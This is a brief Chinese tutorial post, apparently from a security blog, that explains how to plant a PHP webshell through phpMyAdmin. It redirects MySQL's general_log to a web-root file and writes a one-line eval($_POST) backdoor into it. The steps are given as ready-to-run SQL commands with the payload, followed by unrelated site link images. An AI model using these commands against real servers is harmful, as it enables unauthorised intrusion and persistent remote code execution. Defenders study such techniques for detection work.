1、登录phpmyadmin
2、查看数据路径,作为猜web路径辅助
select @@datadir;
3、查看日志功能是否开启:
(一般这个日志记录是默认关闭的,需要我们手动开启)
show variables like '%general%';
4、开启日志功能:
SET GLOBAL general_log='on';
5、修改日志路径:
set global general_log_file='D:\\phpStudy\\WWW\\shell.php';
6、执行包含shell的语句即可:
select "<?php eval($_POST['gg']);?>";
7、查看结果:
8、ps:发布文章火绒提示webshell….
![[原]Nessus扫描器安装-微慑信息网-VulSee.com](http://vulsee.com/wp-content/uploads/2017/12/344.png)
![[猎奇]007迷研发出喷火摩托车 火焰逼退汽车-微慑信息网-VulSee.com](http://www.im286.com/attachments/month_1003/1003251245405854a78679f3bf.jpg)
![[溢出]溢出工具包:Metasploit使用说明-微慑信息网-VulSee.com](http://lvhuana.bokee.com/inc/met1.gif)
![[八卦] 王婷婷—揭秘一个大三女生的性爱录像-微慑信息网-VulSee.com](http://free.86hy.com/crack/pic/1.jpg)
![[随笔]今天国际警察节-微慑信息网-VulSee.com](http://photo.sohu.com/20041017/Img222528326.jpg)
青云网
